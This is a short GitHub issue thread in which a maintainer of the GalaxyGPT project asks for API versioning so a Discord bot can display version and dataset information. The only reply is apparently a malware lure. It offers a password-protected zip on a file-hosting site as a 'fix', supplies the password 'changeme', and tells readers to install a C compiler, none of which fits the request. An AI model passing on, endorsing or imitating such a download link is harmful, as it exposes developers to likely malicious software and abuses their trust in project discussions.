### ISSUE TITLE
Fix up versioning

### ISSUE THREAD

**Issue by smallketchup82** [Galaxypedia-Wiki/GalaxyGPT#81]
really need to get api versioning or anything really fixed

i want ketchupbot-discord to show the user the galaxygpt version and dataset creation date on each request

**Comment by SagarChandra07** [comment]
maybe this will help
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file

Password: changeme
If you don't have the c compliator, install it.(gcc or clang)
